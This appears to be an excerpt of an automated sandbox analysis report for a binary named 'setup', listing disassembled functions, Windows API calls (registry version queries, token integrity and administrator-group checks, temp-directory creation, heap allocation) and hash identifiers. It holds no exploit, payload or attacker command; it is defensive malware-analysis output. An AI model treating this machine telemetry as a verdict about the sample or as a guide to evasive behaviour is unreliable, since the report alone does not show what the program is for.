                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                                                                                              • String ID: UxTheme.dll
                                                                                                                                                                              • API String ID: 2586271605-352951104
                                                                                                                                                                              • Opcode ID: 75dce3cf6faa80780781cca4fe433c20a42382b1d87c08022deaef6910d67a01
                                                                                                                                                                              • Instruction ID: 068ecc62520be13866f13f6d31759f70d04cf19ebb339b4ecf7998f04be1444a
                                                                                                                                                                              • Opcode Fuzzy Hash: 75dce3cf6faa80780781cca4fe433c20a42382b1d87c08022deaef6910d67a01
                                                                                                                                                                              • Instruction Fuzzy Hash: ECA18BB0501645EFE714DF64C858BAABBF4FF04318F20825DD4299B6C1DBB6A618CB90

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00CD14E0
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 00CD151B
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00CD1596
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CD176E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                                              • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                                                                                                                                              • API String ID: 1586453840-3149529848
                                                                                                                                                                              • Opcode ID: 0f872ced4df98a3476f591b08add6f1e60eca958a7668d7d1ec2bc0a9eb38c07
                                                                                                                                                                              • Instruction ID: 7ca58ea169e09e871f0192fe11255ace1b7727abbf5ed2509e743566d20c8e79
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f872ced4df98a3476f591b08add6f1e60eca958a7668d7d1ec2bc0a9eb38c07
                                                                                                                                                                              • Instruction Fuzzy Hash: EF71A478700318AADB209B31ED417AA73B5EB85744F19507BEF16A7791EB34CE4A8780

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00CD12D2
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00CD1324
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CD13B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD13BF
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD13D3
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00CD13F6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CD1437
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcProcess
                                                                                                                                                                              • String ID: $CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                                                                                                                              • API String ID: 1850716914-483456580
                                                                                                                                                                              • Opcode ID: d9b643a4050dd598a880775d5eacf5eff166cc8de8c70d74e43425d0f61bf4a7
                                                                                                                                                                              • Instruction ID: c2669d488fa3aa0ae58072d52efb8afb448600c58d8726c738fadc3ff40ea3fd
                                                                                                                                                                              • Opcode Fuzzy Hash: d9b643a4050dd598a880775d5eacf5eff166cc8de8c70d74e43425d0f61bf4a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 9791A1B1900328AEDB20CF21CC45B9AB7B5FB45710F0442A6E919B7290DB76AE98CF50

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CC7328
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CC7335
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC733F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00DEB0F5), ref: 00CC7369
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC736F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00DEB0F5,00DEB0F5,00DEB0F5), ref: 00CC7395
                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CC73C8
                                                                                                                                                                              • EqualSid.ADVAPI32(00000000,?), ref: 00CC73D7
                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00CC73E6
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CC7420
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                                                                                              • String ID: Ls
                                                                                                                                                                              • API String ID: 695978879-1452845052

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 150 bb180e-bb1822 call d80260 153 bb1849-bb1850 150->153 154 bb1824-bb1846 call d80118 call d80216 150->154 155 bb1a87-bb1ac3 call ba7830 call d7fd55 153->155 156 bb1856 call cc72e0 153->156 154->153 162 bb185b-bb186e 156->162 168 bb18ba-bb18c1 162->168 169 bb1870-bb1884 call d80260 162->169 171 bb18c3-bb18d3 168->171 172 bb18d5-bb18ff GetWindowsDirectoryW call d89c73 168->172 169->168 176 bb1886-bb18b7 GetModuleHandleW GetProcAddress call d80216 169->176 178 bb1902-bb1911 171->178 172->178 176->168 182 bb19bf-bb19c1 178->182 183 bb1917-bb1964 call cc74e0 call cc76d0 * 2 call cc7c40 178->183 182->155 184 bb19c7-bb19ee 182->184 203 bb199a-bb19a9 call cc7580 183->203 204 bb1966-bb1994 CreateDirectoryW 183->204 186 bb19f0-bb19f9 184->186 186->186 188 bb19fb-bb1a37 call ba8300 call cbd440 186->188 198 bb1a6a-bb1a80 188->198 199 bb1a39-bb1a4e 188->199 198->155 201 bb1a60-bb1a67 call d7fd63 199->201 202 bb1a50-bb1a5e 199->202 201->198 202->201 203->182 204->203
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00BB1897
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00BB189E
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB1841
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00BB18B2
                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00BB18E1
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?), ref: 00BB1994
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$DirectoryEnterInit_thread_footerLeave$AddressConditionCreateHandleModuleProcVariableWakeWindows
                                                                                                                                                                              • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
                                                                                                                                                                              • API String ID: 1425133133-595641723

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 252 cb08f0-cb0925 253 cb096a-cb0988 252->253 254 cb0927-cb093b call d80260 252->254 254->253 257 cb093d-cb0944 call cb0a00 254->257 259 cb0949-cb0967 call d80118 call d80216 257->259 259->253
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CB0962
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                                                                              • String ID: h
                                                                                                                                                                              • API String ID: 2296764815-3790492082

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 264 d97f27-d97f3b GetLastError 265 d97f3d-d97f45 call d99c6f 264->265 266 d97f57-d97f61 call d99cae 264->266 271 d97f52 265->271 272 d97f47-d97f50 265->272 273 d97f63-d97f65 266->273 274 d97f67-d97f6f call d99720 266->274 271->266 275 d97fcc-d97fd7 SetLastError 272->275 273->275 277 d97f74-d97f7a 274->277 278 d97f8d-d97f9b call d99cae 277->278 279 d97f7c-d97f8b call d99cae 277->279 285 d97f9d-d97fab call d99cae 278->285 286 d97fb4-d97fc9 call d97c04 call d9817e 278->286 284 d97fac-d97fb2 call d9817e 279->284 293 d97fcb 284->293 285->284 286->293 293->275
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000001,0000000B,00D85304,00D981FB,00000009,?,00D8142C,0000000B,00000009,00000009,?,?,00BB079C,0000000D,0000000D), ref: 00D97F2B
                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00D97FCD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1452528299-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 296 cd1040-cd1075 297 cd10be-cd10d1 296->297 298 cd1077-cd108b call d80260 296->298 298->297 301 cd108d-cd10a5 call cd0d50 call cd10e0 298->301 305 cd10aa-cd10bb call d80216 301->305 305->297
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D80260: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D8026B
                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,E5106CA8,?,?,00DA83BD,000000FF,?,00BA1177,E5106CA8,?,00DAA90F), ref: 00D802A8
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                                • Part of subcall function 00CD10E0: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD10B6
                                                                                                                                                                                • Part of subcall function 00D80216: EnterCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80220
                                                                                                                                                                                • Part of subcall function 00D80216: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,00BAAE07,00EA0B9C,00E0A670), ref: 00D80253
                                                                                                                                                                                • Part of subcall function 00D80216: RtlWakeAllConditionVariable.NTDLL ref: 00D802CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3563064969-0
                                                                                                                                                                              • Opcode ID: 9f2850d66d4e28f434359c9a9c912132062bb45eebf02e1c0d22cc962ccadad5
                                                                                                                                                                              • Instruction ID: f8e8516142909df72841f5a0fb096e39cbd4b5dd13fce6aa336f703a6bec7d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f2850d66d4e28f434359c9a9c912132062bb45eebf02e1c0d22cc962ccadad5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9301F771B40644EFC310EB59DD02B19B3B4E70AB30F144326EE31AB3C0CA71BA048B52

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 308 d99720-d9972b 309 d99739-d9973f 308->309 310 d9972d-d99737 308->310 312 d99758-d99769 RtlAllocateHeap 309->312 313 d99741-d99742 309->313 310->309 311 d9976d-d99778 call d852ff 310->311 317 d9977a-d9977c 311->317 314 d9976b 312->314 315 d99744-d9974b call d9792b 312->315 313->312 314->317 315->311 321 d9974d-d99756 call d95443 315->321 321->311 321->312
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,0000000D,00000001,?,00D97F74,00000001,00000364,00000001,00000006,000000FF,?,00D8142C,0000000B,00000009,00000009), ref: 00D99761
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 4465cbe7382cb8ef3a4627ae1fe176e67da5aeb91f6e9298fe50badbaa310e52
                                                                                                                                                                              • Instruction ID: a348efbaa3341ea12f4806906a88e2338402ce45b70c28ab446868803f81fd9d
                                                                                                                                                                              • Opcode Fuzzy Hash: 4465cbe7382cb8ef3a4627ae1fe176e67da5aeb91f6e9298fe50badbaa310e52
                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0E931530624ABEF213FEEAD11B9AB7C9EF41770B188019B805AB080DE20D80186F1

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 324 baa9b0-baaa0e call baa9a0 call d81aea RtlAllocateHeap
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00D81AEA: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000009,?,00000009,?,00D7D7B0,00000009,00E965FC,00000000,00000009), ref: 00D81B4A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,E5106CA8,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00BA11E6,80004005,E5106CA8,?,00DAA90F), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateExceptionHeapRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3789339297-0
                                                                                                                                                                              • Opcode ID: 791575064c38c9ce17e6c8ffcfda8aebd8a9d11cb7ece28f7b9e4b7075e33328
                                                                                                                                                                              • Instruction ID: 5437f2b4f79dd54f5ecbf7b461b5ed4637e998ac252313206926038e89d6ffab
                                                                                                                                                                              • Opcode Fuzzy Hash: 791575064c38c9ce17e6c8ffcfda8aebd8a9d11cb7ece28f7b9e4b7075e33328
                                                                                                                                                                              • Instruction Fuzzy Hash: FFF0A031A48248FFCB05DF54DC02F5ABBA8FB09B10F10866AF915926A0DB36A905CB64
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BB6B00: EnterCriticalSection.KERNEL32(00EA699C,E5106CA8,00000002,00000000,00DAB45D,000000FF,?,00BB5A77,00000002,00000000,E5106CA8), ref: 00BB6B3D
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6BB8
                                                                                                                                                                                • Part of subcall function 00BB6B00: LoadCursorW.USER32(00000000,00007F00), ref: 00BB6C5E
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 00BB6844
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00BB6926
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00BB6934
                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 00BB6988
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A2C
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 00BB6A73
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00BB6A92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeGlobalString$CursorLoadNtdllProc_Window$AllocCriticalEnterLockSectionUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 306625881-0
                                                                                                                                                                              • Opcode ID: 62e8abd6381b3f7f5024074446f5d45e5ec1f76b1de1c1e90b601dc42c2d9b00
                                                                                                                                                                              • Instruction ID: 216102286f4eae4a2085ab877fc3cb273e191611e8525b8403460f4dbf7dacdc
                                                                                                                                                                              • Opcode Fuzzy Hash: 62e8abd6381b3f7f5024074446f5d45e5ec1f76b1de1c1e90b601dc42c2d9b00
                                                                                                                                                                              • Instruction Fuzzy Hash: 47D1AE71900205AFDF10DFA5CC48BBEBBF8EF45714F1481A9E911A7290DBB99E04CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,00BB8164,?), ref: 00D7F8BF
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8C6
                                                                                                                                                                              • InitializeSListHead.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8D3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F8E8
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8EF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948463281.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948530636.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1475849761-0
